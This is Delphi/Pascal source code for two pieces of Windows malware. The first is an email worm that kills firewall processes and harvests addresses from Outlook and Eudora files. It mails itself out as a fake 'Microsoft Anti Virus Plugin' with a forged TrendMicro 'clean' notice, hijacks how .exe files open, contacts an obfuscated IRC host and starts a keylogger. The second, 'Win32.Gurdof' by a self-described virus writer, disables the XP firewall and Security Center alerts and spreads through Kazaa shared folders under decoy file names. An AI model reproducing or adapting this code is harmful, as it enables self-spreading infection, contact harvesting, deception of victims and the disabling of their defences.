res:=Recv(MySocket,Buffer,sizeof(buffer),0); //sock.WriteString(MySocket,pchar('PASS 666'+#13+#10)); sleep(500); sock.WriteString(MySocket,pchar(crypt('OK@O%')+nukemsg+#13+#10)); //NICK while not ExitCode<>ExitCode2 do processmessages; end; //===fuck_protection procedure scanprotection; begin if findwindow(nil,@(crypt('OgwEuv@}hxo'))[1])<>0 then //NetAppGuard begin killprocess(crypt('OgwEuv@}hxo')); //NetAppGuard end; if findwindow(nil,@(crypt('BmmW`gk(YI+JD\JGP^_'))[1])<>0 then //ConSeal PC FIREWALL begin killprocess(crypt('BmmW`gk(YI+JD\JGP^_')); appmsg(pchar(crypt('HR#ekb''ijidycz/~pv4yyp|~;ss>lIFLBHDGD eABJWP^wZXd]XVzTLZ7 ./d3#5; %%b'))); end; exit; end; //====== Spammer =========== type TSpam = class(TObject) procedure base64(var hFile: File; var sLine: string; var More: boolean); procedure start; procedure send; procedure scanmail; procedure scanmail2; procedure fileini; procedure MyHwndProc(var msg:TMessage); end; type TLookup = array [0..64] of Char; const SocketMessage = WM_USER+108; const Base64Out: TLookup = ( 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/', '=' ); var WSM : TWSAData; myhwnd2:THandle; MySocket2: TSocket; MyName2 : TSockAddr; MyAddr2 : TInAddr; res2 : word; buffer2,host2: string; procedure TSpam.MyHwndProc(var msg:TMessage); begin //FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessage then begin if msg.LParamLo = FD_CLOSE then begin closesocket(mysocket2); end; // if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); if msg.LParamLo = FD_READ then begin res2:=Recv(MySocket2,Buffer2,sizeof(Buffer2),0); if res2=-1 then begin // S:='Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket2); WSACleanup; end; //writeln(buffer2); end; end; end; procedure TSpam.Base64(var hFile: File; var sLine: string; var More: boolean); var Count : integer; DataIn : array [0..2] of byte; DataOut : array [0..80] of byte; ByteCount : integer; i : integer; // hfile:file; // sline:string; begin Count := 0; {$I-} while not Eof(hFile) do begin {$I+} BlockRead(hFile, DataIn, 3, ByteCount); DataOut[Count] := (DataIn[0] and $FC) shr 2; DataOut[Count + 1] := (DataIn[0] and $03) shl 4; if ByteCount > 1 then begin DataOut[Count + 1] := DataOut[Count + 1] + (DataIn[1] and $F0) shr 4; DataOut[Count + 2] := (DataIn[1] and $0F) shl 2; if ByteCount > 2 then begin DataOut[Count + 2] := DataOut[Count + 2] + (DataIn[2] and $C0) shr 6; DataOut[Count + 3] := (DataIn[2] and $3F); end else begin DataOut[Count + 3] := $40; end; end else begin DataOut[Count + 2] := $40; DataOut[Count + 3] := $40; end; for i := 0 to 3 do DataOut[Count + i] := Byte(Base64Out[DataOut[Count + i]]); Count := Count + 4; if Count > 59 then break; end; DataOut[Count] := $0; sLine := StrPas(@DataOut[0]); {$I-} More := not Eof(hFile); {$I+} end; procedure TSpam.start; var i:TRegistry; ss:string; begin //writeln('START'); if fileexists(systemdir+'\outlook.ini') then begin send; exit; end; Filemode:=2; assignfile(ttt,systemdir+'\outlook.ini'); rewrite(ttt); append(ttt); //memo1.clear; writeln(ttt,'[OUTL]'); i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.OpenKey('Software\Microsoft\WAB\WAB4\Wab File Name',true); //memo1.lines.add(i.ReadString('')); outlook:=i.ReadString(''); i.Free; i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager',true); ss:=i.ReadString('Default Mail Account'); //memo1.lines.add('Mail account: '+s); i.Free; i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager\Accounts\'+ss,true); if i.ReadString('SMTP Server')='' then writeln(ttt,'[SERV]'+'mail.'+crypt('bmntpubzo')+'.com') else //compuserve writeln(ttt,'[SERV]'+i.ReadString('SMTP Server')); i.Free; i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager\Accounts\'+ss,true); if i.ReadString('SMTP Port')='' then writeln(ttt,'[PORT]'+'25') else writeln(ttt,'[PORT]'+i.ReadString('SMTP Port')); i.Free; ScanMail; writeln(ttt,'[EUDO]'); i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.OpenKey('Software\Qualcomm\Eudora\CommandLine',true); ss:=i.ReadString('Current'); delete(ss,pos('.',ss)-6,length(ss)); eudora:=ss; i.Free; fileini; ScanMail2; closefile(ttt); send; end; procedure TSpam.send; var day,month,i:integer; s:string; ff:file of char; c:char; zday,zmonth,slav,user,serv,zport:string; sock:TSock; SystemTime:TSystemTime; w:longint; hfile:file; sline:string; more:boolean; FMimeBoundary,filename:string; begin if not fileexists(systemdir+'\outlook.ini') then exit; sleep(1200000); // 20 min Filemode:=2; assignfile(ff,systemdir+'\outlook.ini'); reset(ff); i:=0; s:=''; WSAStartup($101,WSM); repeat i:=filepos(ff); blockread(ff,c,sizeof(c)); s:=s+c; if c=#10 then begin if copy(s,1,6)='[KILL]' then begin closefile(ff); exit; end; if copy(s,1,6)='[SERV]' then serv:=copy(s,7,pos(#13,s)-7); if copy(s,1,6)='[PORT]' then zport:=copy(s,7,pos(#13,s)-7); if copy(s,1,6)='[EUDO]' then zport:='25'; if copy(s,1,6)='[USER]' then begin user:=copy(s,7,pos(#13,s)-7); end; if copy(s,1,6)='[SLAV]' then begin seek(ff,i-length(s)+1); blockwrite(ff,'[FUCK]',sizeof('[FUCK]')); slav:=copy(s,7,pos(#13,s)-7); //memo1.lines.add(serv+' : '+port+' : '+user+' : '+slav); writeln(serv+' : '+zport+' : '+user+' : '+slav); sleep(20000); w:=lookup_hostname(serv); host2:=ip2string(w); //host2:='127.0.0.1'; MySocket2:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr2.S_addr:=Inet_Addr(@Host2[1]); MyName2.sin_family:=PF_INET; MyName2.sin_port:=htons(strtoint(zport)); //port to connect MyName2.sin_addr:=MyAddr2; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res2:=connect(MySocket2,MyName2,sizeof(MyName2)); if res2<>0 then begin // S:='Suck Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket2); WSACleanup; exit; end; myhwnd2 := AllocateHwnd(MyHWndProc); WSAAsyncSelect(MySocket2, myhwnd2, SocketMessage, FD_READ OR FD_WRITE OR FD_CLOSE ); FileName:=paramstr(0); //FileName:='c:\temp\hmm.sep'; with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); FMimeBoundary := '=Multipart Boundary '+ //FormatDateTime('mmddyyhhnn', Now); inttostr(systemtime.wMonth)+inttostr(systemtime.wDay)+inttostr(systemtime.wYear)+inttostr(systemtime.wHour)+inttostr(systemtime.wMinute); //writeln('let''s rock'); sock.WriteString(MySocket2,pchar('HELO '+serv+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('MAIL FROM: '+user+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('RCPT TO: '+slav+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('DATA'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('From: '+user+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('To: '+slav+#13+#10)); sleep(timeout+10); //sock.WriteString(MySocket2,pchar('Subject: Fwd: Microsoft Anti Virus Plugin'+#13+#10)); sock.WriteString(MySocket2,pchar('Subject: Fwd: Microsoft Anti Virus Plugin'+#13+#10)); randomize; day:=systemtime.wDayOfWeek; case day of 0: zday:='Sun'; 1: zday:='Mon'; 2: zday:='Tue'; 3: zday:='Wed'; 4: zday:='Thu'; 5: zday:='Fri'; 6: zday:='Sat'; end; month:=systemtime.wMonth; case month of 1: zmonth:='Jan'; 2: zmonth:='Feb'; 3: zmonth:='Mar'; 4: zmonth:='Apr'; 5: zmonth:='May'; 6: zmonth:='Jun'; 7: zmonth:='Jul'; 8: zmonth:='Aug'; 9: zmonth:='Sep'; 10: zmonth:='Oct'; 11: zmonth:='Nov'; 12: zmonth:='Dec'; end; sleep(timeout+10); sock.WriteString(MySocket2,pchar('Date: '+zday+', '+inttostr(systemtime.wDay)+' '+zmonth+ ' '+inttostr(systemtime.wYear)+' '+inttostr(systemtime.wHour)+':'+inttostr(systemtime.wMinute)+':'+inttostr(systemtime.wSecond)+' +0000'+#13+#10)); //Date: Fri, 27 Dec 2002 16:46:11 +0000 sleep(timeout+10); sock.WriteString(MySocket2,pchar('Mime-Version: 1.0'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'multipart/mixed' + '; boundary="' +FmimeBoundary+ '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--'+FmimeBoundary+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'text/plain' + '; charset="' +'iso-8859-1' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Transfer-Encoding: quoted-printable'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Microsoft Anti Virus Plugin Detected any Suspiciuos files.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Test your computer today and foward this Email.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Free service (for win95/98/Me/NT/2000/Xp).'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('___________________________________________________________'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('TrendMicro has scanned this mail for viruses, vandals'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('and suspicious attachments and has found it to be CLEAN.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(' '+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('File: MSPlug-in.exe data (32,768 bytes)'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Encoding: Base64'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Result: Clean.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--'+FmimeBoundary+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'application/octet-stream' + ';'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(#9+'name="' + 'MSPlug-in.exe' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Transfer-Encoding: base64'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Disposition: attachment;'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(#9+'filename="' + 'MSPlug-in.exe' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); AssignFile(hFile,filename); FileMode := 0; Reset(hFile, 1); repeat BASE64(hfile, sLine, More); if sline<>'' then sock.WriteString(MySocket2,pchar(sline+#13+#10)); sleep(timeout); until sline=''; more:=true; closefile(hfile); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--' + FMimeBoundary + '--'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('QUIT'+#13+#10)); sleep(timeout+10); closesocket(mysocket2); //writeln('All done.'); end; s:=''; end; until eof(ff); seek(ff,0); blockwrite(ff,'[KILL] ',sizeof('[KILL] ')); closefile(ff); //writeln('DEAD'); if TerminateThread(ThreadHdle3, ExitCode3) then begin closefile(ff); closesocket(mysocket2); WSACleanup; exit;end; WSACleanup; end; procedure TSpam.ScanMail2; var i,yyyy,yyy,yy,count,NumRead: integer; poss,poss2,poss3:longint; bufffT,Bufff,bufff2: Char; tof:textfile; a,b,c,d,e,f,g,thepoint:boolean; From:file; x,y,z:byte; pp1,pp2,p1,p2,ss2,s,s2,s3,s4,s5,s6:string; begin a:=false; b:=false; c:=false; d:=false; //special e:=false; f:=false; g:=false; thepoint:=false; count:=0; poss:=0; //if eudora+'NNDBASE.TXT'='' then begin writeln('No Eudora File found'); exit; end; if fileexists(eudora+'NNDBASE.TXT') then begin filemode:=0; Assignfile(From,eudora+'NNDBASE.TXT'); Reset(From, 1); yy:=filesize(from); end else begin //writeln('I can''t open the file...'); exit; end; repeat //processmessages; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff='@' then begin poss:=filepos(from); poss2:=poss; a:=true end; if a=true then begin poss:=poss-1; repeat poss:=poss-1; count:=count+1; if poss>0 then seek(From,poss) else begin c:=true; g:=true; end; //memo1.Lines.add(inttostr(poss)); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '.' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true; end else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if count=26 then begin b:=true; g:=true;end; if b=true then if count<4 then begin c:=true; g:=true; end else c:=true; until c=true; // memo1.Lines.add('1:'+inttostr(poss)+' 2:'+inttostr(poss2)); poss3:=poss; b:=false; c:=false; count:=0; poss2:=poss2-1; repeat poss2:=poss2+1; count:=count+1; seek(From,poss2); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true end else if bufff = '.' then {memo1.Lines.add(bufff)} thepoint:=true else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if thepoint<>true then g:=true; if count=60 then begin c:=true; g:=true;end; if b=true then if count<2 then begin c:=true; g:=true; end else c:=true; until c=true; c:=false; b:=false; a:=false; count:=0; s:=''; poss:=poss+1; e:=true; repeat //filtre seek(From,poss); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); poss:=poss+1; if e=true then if (bufff='@') or (bufff='.') then begin g:=true; e:=false; end else e:=false; f:=true; seek(From,poss); BlockRead(From, Bufff2, SizeOf(Bufff2), NumRead); seek(From,poss-1); if bufff='@' then if bufff2='.' then g:=true; if bufff='.' then if bufff2='@' then g:=true; if bufff='.' then if bufff2='.' then g:=true; s:=s+bufff; until poss=poss2; if s='@' then g:=true; repeat p2:=s; delete(p2,1,length(p2)-3); pp1:=p2; pp2:=p2; delete(p2,2,length(p2)); if p2='.' then begin x:=9; delete(pp1,1,1); delete(pp1,3,3); if pp1[1] in ['0'..'9'] then x:=5; if pp1[1] = '_' then x:=5; if pp1[1] = '-' then x:=5; if pp1[1] = '.' then x:=5; delete(pp2,1,2); if pp2[1] in ['0'..'9'] then x:=5; if pp2[1] = '_' then x:=5; if pp2[1] = '-' then x:=5; if pp2[1] = '.' then x:=5; end else x:=5; p1:=s; delete(p1,1,length(p1)-4); if p1='.org' then y:=9 else if p1='.com' then y:=9 else if p1='.mil' then y:=9 else if p1='.gov' then y:=9 else if p1='.int' then y:=9 else if p1='.edu' then y:=9 else if p1='.net' then y:=9 else y:=5; if x=y then begin g:=true; x:=6; end; if x<>y then begin x:=6; end; s:=s; until x=6; if s=s2 then f:=false; //same if (length(s)<6) then f:=false; if f=true then writeln(ttt,'[SLAV]'+s); s2:=s; seek(From,poss2); f:=false; g:=false; end; e:=false; //processmessages; until numread=0; Closefile(From); d:=false; exit; processmessages; end; procedure TSpam.ScanMail; var i,yyyy,yyy,yy,count,NumRead: integer; poss,poss2,poss3:longint; bufffT,Bufff,bufff2: Char; tof:textfile; a,b,c,d,e,f,g,thepoint:boolean; From:file; x,y,z:byte; pp1,pp2,p1,p2,ss2,s,s2,s3,s4,s5,s6:string; begin a:=false; b:=false; c:=false; d:=false; //special e:=false; f:=false; g:=false; thepoint:=false; count:=0; poss:=0; if outlook='' then begin //writeln('No WAB File found'); exit; end; filemode:=0; if fileexists(outlook) then begin Assignfile(From,outlook); Reset(From, 1); yy:=filesize(from); end else begin //writeln('I can''t open the file...'); exit; end; seek(from,80000); repeat //processmessages; bufffT:=bufff; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if (bufff=':') and (bufffT='U') then d:=true; if bufff='@' then begin poss:=filepos(from); poss2:=poss; a:=true end; if a=true then begin poss:=poss-1; repeat poss:=poss-1; count:=count+1; if poss>0 then seek(From,poss) else begin c:=true; g:=true; end; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '.' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true; end else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if count=26 then begin b:=true; g:=true;end; if b=true then if count<4 then begin c:=true; g:=true; end else c:=true; until c=true; poss3:=poss; b:=false; c:=false; count:=0; poss2:=poss2-1; repeat poss2:=poss2+1; count:=count+1; seek(From,poss2); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true end else if bufff = '.' then {memo1.Lines.add(bufff)} thepoint:=true else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if thepoint<>true then g:=true; if count=60 then begin c:=true; g:=true;end; if b=true then if count<2 then begin c:=true; g:=true; end else c:=true; until c=true; c:=false; b:=false; a:=false; count:=0; s:=''; poss:=poss+1; e:=true; repeat //filtre seek(From,poss); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); poss:=poss+1; if e=true then if (bufff='@') or (bufff='.') then begin g:=true; e:=false; end else e:=false; f:=true; seek(From,poss); BlockRead(From, Bufff2, SizeOf(Bufff2), NumRead); seek(From,poss-1); if bufff='@' then if bufff2='.' then g:=true; if bufff='.' then if bufff2='@' then g:=true; if bufff='.' then if bufff2='.' then g:=true; s:=s+bufff; until poss=poss2; if s='@' then g:=true; repeat p2:=s; delete(p2,1,length(p2)-3); pp1:=p2; pp2:=p2; delete(p2,2,length(p2)); if p2='.' then begin x:=9; delete(pp1,1,1); delete(pp1,3,3); if pp1[1] in ['0'..'9'] then x:=5; if pp1[1] = '_' then x:=5; if pp1[1] = '-' then x:=5; if pp1[1] = '.' then x:=5; delete(pp2,1,2); if pp2[1] in ['0'..'9'] then x:=5; if pp2[1] = '_' then x:=5; if pp2[1] = '-' then x:=5; if pp2[1] = '.' then x:=5; end else x:=5; p1:=s; delete(p1,1,length(p1)-4); if p1='.org' then y:=9 else if p1='.com' then y:=9 else if p1='.mil' then y:=9 else if p1='.gov' then y:=9 else if p1='.int' then y:=9 else if p1='.edu' then y:=9 else if p1='.net' then y:=9 else y:=5; if x=y then begin g:=true; x:=6; end; if x<>y then begin x:=6; end; s:=s; until x=6; if (length(s)<6) then f:=false; if d=true then begin s:='[USER]'+s; d:=false; end else s:='[SLAV]'+s; if f=true then writeln(ttt,s); s2:=s; seek(From,poss2); f:=false; g:=false; end; e:=false; //processmessages; until numread=0; Closefile(From); exit; d:=false; processmessages; end; procedure TSpam.fileini; const log = 'ReturnAddress='; log2 = 'SMTPServer='; var tt:textfile; s,s2:string; begin if not fileexists(eudora+'EUDORA.INI') then begin {form1.memo1.lines.add('no files exist');} exit; end; assignfile(tt,eudora+'EUDORA.INI'); reset(tt); s2:='_'; repeat readln(tt,s); s2:=s; s:=copy(s2,1,length(log)); if s=log then begin s:=copy(s2,length(log)+1,length(s2)); writeln(ttt,'[USER]'+s); end; s:=copy(s2,1,length(log2)); if s=log2 then begin s:=copy(s2,length(log2)+1,length(s2)); if s='' then writeln(ttt,'[SERV]'+crypt('lcjh+eheyxixj>r}~')) else writeln(ttt,'[SERV]'+s); end; until eof(tt); closefile(tt); exit; end; //============Thread_procedure=== procedure ThreadProc3; stdcall; var Spam:TSpam; begin sleep(90000); //writeln('SPAM'); spam.start; end; procedure ThreadProc2; stdcall; begin sleep(160000); //writeln('CONNECT IRC'); hede.server; if TerminateThread(ThreadHdle2, ExitCode2) then begin closesocket(mysocket); WSACleanup; end; end; procedure ThreadProc; stdcall; var ck1,ck2,ck3:boolean; begin ck1:=false; ck2:=false; ck3:=false; //initsocket; repeat WSACleanup; WSAStartup($101,WSD); z:=lookup_hostname(crypt('vut*hodzfydjy l|')) // z:=lookup_hostname('--'); //write(z); //write(' '+ip2string(z)+' '); if z>0 then ck1:=true else ck1:=false; if (ck1=true) and (ck2=false) then begin ck2:=true; ck3:=true; WSACleanup; initsocket; // writeln('connect'); ThreadHdle2 := CreateThread( Nil,0,@ThreadProc2,Nil,0,ThreadID2); //connect sleep(1000); ThreadHdle3 := CreateThread( Nil,0,@ThreadProc3,Nil,0,ThreadID3); //scan protection end; if (ck1=false) and (ck3=true) then begin ck3:=false; ck2:=false; ShutDownServer; WSACleanup; // writeln('disconnect'); GetExitCodeThread(ThreadHdle2, ExitCode2); TerminateThread(ThreadHdle2, ExitCode2); GetExitCodeThread(ThreadHdle3, ExitCode3); TerminateThread(ThreadHdle3, ExitCode3); end; sleep(60000); until TerminateThread(ThreadHdle, ExitCode); //z=777; ShutDownServer; end; //=== This is the MAIN PART program ======= begin scanprotection; if paramstr(0)=systemdir+crypt(']IFVKCK;;$]TI') then //\KERNEL32.VXD begin if (length(paramstr(1))>0) and (length(paramstr(2))>0) then winexec(PChar(paramstr(1)+' '+paramstr(2)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))=0) then winexec(PChar(paramstr(1)),SW_NORMAL); winexec(pchar(systemdir+crypt(']ifvkck&mfg')),SW_NORMAL); //\kernel.dll halt; end; if (paramstr(0)<>systemdir+crypt(']IFVKCK;;$]TI')) and (paramstr(0)<>systemdir+crypt(']IFVKCK&MFG')) then //\KERNEL32.VXD //\KERNEL.DLL begin if MessageBoxA(Handle, 'Microsoft Anti Virus Plugin Detected any Suspiciuos files.'+#13+#10+ 'Well it''s time to check if your system is ready.'+#13+#10+' '+#13#10+ 'Do you want start the Av Test ?', MB_YESNO)=IDYES then begin MessageBox(Handle,'Please wait...',MB_ICONINFORMATION); fileexists(systemdir+'\kernel32.dll'); sleep(1000); MessageBox(Handle,'Test successfull !'+#13#10+' '+#13#10+'Your system are Virus Free',MB_ICONINFORMATION); end; end; if FindWindow(lpzClassName,lpzWindowsName) <> 0 then Halt;//If start second time hInst:=GetModuleHandle(nil); with wClass do begin Style:= CS_PARENTDC; hIcon:= 0; cbClsExtra:= 0; cbWndExtra:= 0; lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_WINDOW; lpszClassName:= lpzClassName; lpszMenuName:= NIL; hCursor:= 0; //LoadCursor(0,IDC_ARROW); end; RegisterClass(wClass); Handle:=CreateWindow(lpzClassName,lpzWindowsName,WS_BORDER + WS_SIZEBOX, 0,0,10,10,0,0{hPP},hInst,nil); if Handle<>0 then begin UpdateWindow(Handle); ShowWindow(Handle, SW_HIDE); //SW_HIDE RegisterInService; end; copyit; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('exefile\shell\open\command',true); Registre.WriteString('',pchar(crypt('jgqj`j4:''|sh-,*!326>'))); //kernel32.vxd "%1" %* Registre.Free; Timeout:=70; ThreadHdle := CreateThread( Nil,0,@ThreadProc,Nil,0,ThreadID); //Online??? repeat sleep(59000); until z>0; if z>0 then klog.LogCreate; ProcessMessages; end.

sources

Win32.Gurdof Hutley program gurdof; //{$APPTYPE CONSOLE} { /////////////////////////////////////////////////////////////////////// Win32.Gurdof by Hutley/RRLF This is my first virus in RRLF (Ready Rangers Liberation Front) Team. //////////////////////////////////////////////////////////////////////// What Win32.Gurdof doing: + Fuck the WinXP Firewall + Simple Function that Decode the Strings + Disable Notifications of Security Center + Infect Kazaa Program + Payload: Sort Randomly a Number Until 20, if the number be < 14 then show messages and hide the mouse icon. Comment: IS VERY SIMPLE I KNOW. I TERMINETED IT BECAUSE I GO START THE STUDY OF ASSEMBLY LANGUAGE. WAIT, COMMING SOON NEWS VIRUSES IN ASM32. Hutley / rRlf - The Psychodelic Virus Writer 24 - Feb - 2006 -*- BRAZIL! } uses Windows, Registry, SysUtils, Dialogs; const vir_name: string = 'Win32.Gurdof'; made_by: string = 'Hutley of rRlf VX Team'; var ExeName: array[0..260] of Char; start_: TRegistry; function code_(text: string; chave: integer): string; var lp1, p: integer; fuck: string; begin lp1 := strlen(pchar(text)); for p := 1 to lp1 do begin fuck := fuck + chr(ord(text[p]) xor chave) end; code_ := fuck end; function WinDir: string; begin SetLength(Result, MAX_PATH); Windows.GetWindowsDirectory(PChar(Result), MAX_PATH); Result := string(PChar(Result)) + '\'; end; function SysDir: string; begin SetLength(Result, MAX_PATH); if GetSystemDirectory(PChar(Result), MAX_PATH) > 0 then Result := string(PChar(Result)) + '\' else Result := ''; end; procedure fuck_xp_firewall; var ffw: TRegistry; begin ffw := TRegistry.Create; ffw.RootKey := HKEY_LOCAL_MACHINE; // Part 1 ffw.OpenKey(code_('Q[QVGO^AwppglvAmlvpmnQgv^Qgptkagq^QjcpgfCaagqq^Rcpcogvgpq^DkpgucnnRmnka{^FmocklRpmdkng', 2), FALSE); ffw.WriteFloat(code_('GjpbaofMlwjej`bwjlmp', 3), 1); ffw.WriteFloat(code_('AjefhaBmvasehh', 4), 0); ffw.WriteFloat(code_('@kJkpEhhksA|gatpmkjw', 5), 0); ffw.CloseKey; // Part 2 ffw.OpenKey(code_('U_URCKZEsttchrEihrtijUcrZUctpoecuZUngtcbGeecuuZVgtgkcrctuZ@otcqgjjVijoeZUrghbgtbVti`ojc', 6), false); ffw.WriteFloat(code_('La{ijdmFg|anaki|agf{', 8), 1); ffw.WriteFloat(code_('OdkhfoLcxo}kff', 10), 0); ffw.WriteFloat(code_('OdEdJggd|Nshn{bdex', 11), 0); ffw.CloseKey; // Part 3 ffw.OpenKey(code_('Xdm|jynWFbhydxdmWXnh~ybr+Hneny', 11), false); ffw.WriteFloat(code_('Kd~c\cxyNcykhfoDe~cls', 10), 1); ffw.WriteFloat(code_('O`{l~heeM`zhkelGf}`op', 9), 1); ffw.WriteFloat(code_('If|a^az}{G~mzzalm', 8), 1); ffw.WriteFloat(code_('AnubpfkkHqbuuncb', 7), 1); ffw.CloseKey; // End ffw.Free; end; procedure infect_p2p_kazaa; var kazaa: TRegistry; begin kazaa := TRegistry.Create; kazaa.RootKey := HKEY_CURRENT_USER; if kazaa.OpenKey(code_('Ui`rqgtcZMG\GGZJiegjEihrchrZ', 6), false) then begin kazaa.WriteFloat(code_('Alvdgi`Vmdwlkb', 5), 0); kazaa.WriteString(code_('@mv4', 4), WinDir); kazaa.WriteString(code_('@mv5', 4), WinDir + code_('Pkbqf', 3)); GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); CreateDir(WinDir + code_('Jqxk|E', 25)); CopyFile(ExeName, PChar(WinDir + code_('G|ufqHg}g`qfKraw}zsK}zKvx{zpq:~ds:qlq', 20)), True); CopyFile(ExeName, PChar(WinDir + code_('F}tgpIwtwlJf|apgJ|{Jwpq;er;pmp', 21)), True); CopyFile(ExeName, PChar(WinDir + code_('DverKgrsxHp~e{?&"nx>Hqbt|~yp9}gp9ror', 23)), True); CopyFile(ExeName, PChar(WinDir + code_('Kpyj}DuaG{wmkqvGqvG~yuqtaG`@`6rh6}`}', 24)), True); CopyFile(ExeName, PChar(WinDir + code_('Ir{hFvixs{tiE|oyqE|oyqE|oyqE|oyq4pj}4b', 26)), True); end; kazaa.Free; end; function show_cursor(const Show: boolean): boolean; var I: integer; begin I := ShowCursor(LongBool(true)); if Show then begin Result := I >= 0; while I < 0 do begin Result := ShowCursor(LongBool(true)) >= 0; Inc(I); end; end else begin Result := I < 0; while I >= 0 do begin Result := ShowCursor(LongBool(false)) < 0; Dec(I); end; end; end; procedure my_payload; var i: integer; begin Randomize; if Random(50) <= 14 then begin for i := 1 to 10 do begin ShowMessagePos(code_('===<[INXSZ<sKrF<eSi<===', 28) + #13#13 + code_('=============Uhiqxd=2=OOQ[', 29), Random(800), Random(600)); show_cursor(false); end; end; end; 